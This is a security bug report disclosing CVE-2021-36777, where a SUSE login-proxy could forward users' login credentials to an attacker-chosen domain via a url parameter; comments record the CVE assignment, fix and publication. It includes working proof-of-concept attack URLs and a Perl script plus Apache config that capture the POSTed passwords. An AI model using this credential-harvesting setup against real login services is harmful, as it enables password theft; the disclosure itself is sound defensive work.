CVE-2021-36777: login-proxy sends password to attacker-provided domain

Description Bernhard Wiedemann 2021-10-01 08:01:27 UTC

When authenticating various SUSE and openSUSE services, we use a login-proxy so that the services themselves do not get to see user passwords.

Today, tiggered by darix and Victor Pereira, I investigated issues about redirecting to attacker-provided URLs. I found that the login-proxy can send the credentials (filled by users into the login form) to an attacker-provided server.

Example attack URL: https://build.opensuse.org/ICSLogin/auth-up/?url=http://www.zq1.de/

On the server side is an apache (with a valid SSL cert for https) with a config line ScriptAlias /ICSLogin/auth-up /usr/lib/cgi-bin/testpost pointing to this script
#!/usr/bin/perl -w use strict; use CGI ":standard"; print header(“text/plain”); if($ENV{REQUEST_METHOD} eq “POST”) { print "\n\nPOST params:\n"; foreach(param()) { print "$_=".param($_)."\n"; } }

also affected: https://hackweek.suse.com/ICSLogin/auth-up/?url=http://www.zq1.de/ https://build.suse.de/ICSLogin/auth-up/?url=http://www.zq1.de/

not affected: https://en.opensuse.org/ICSLogin/auth-up/?url=http://www.zq1.de/

Comment 1 Johannes Segitz 2021-10-01 08:06:42 UTC

Please use CVE-2021-36777 for this

Comment 3 Marcus Rückert 2021-10-06 11:22:17 UTC

The appliance is not affected. the proxy code is only used on our infra.

the bad part that allowed affecting the form via url param is already patched out. the general removal of the url param needs testing.

Comment 4 Bernhard Wiedemann 2021-10-08 02:05:51 UTC

https://gitlab.suse.de/buildops/login-proxy-scripts/-/commit/d0b45f98fc74b254ee0585f26647cb6c8d2c871f by darix fixed this CVE-2021-36777

Comment 6 Johannes Segitz 2022-02-23 09:55:45 UTC

making public. Fix is available and deployed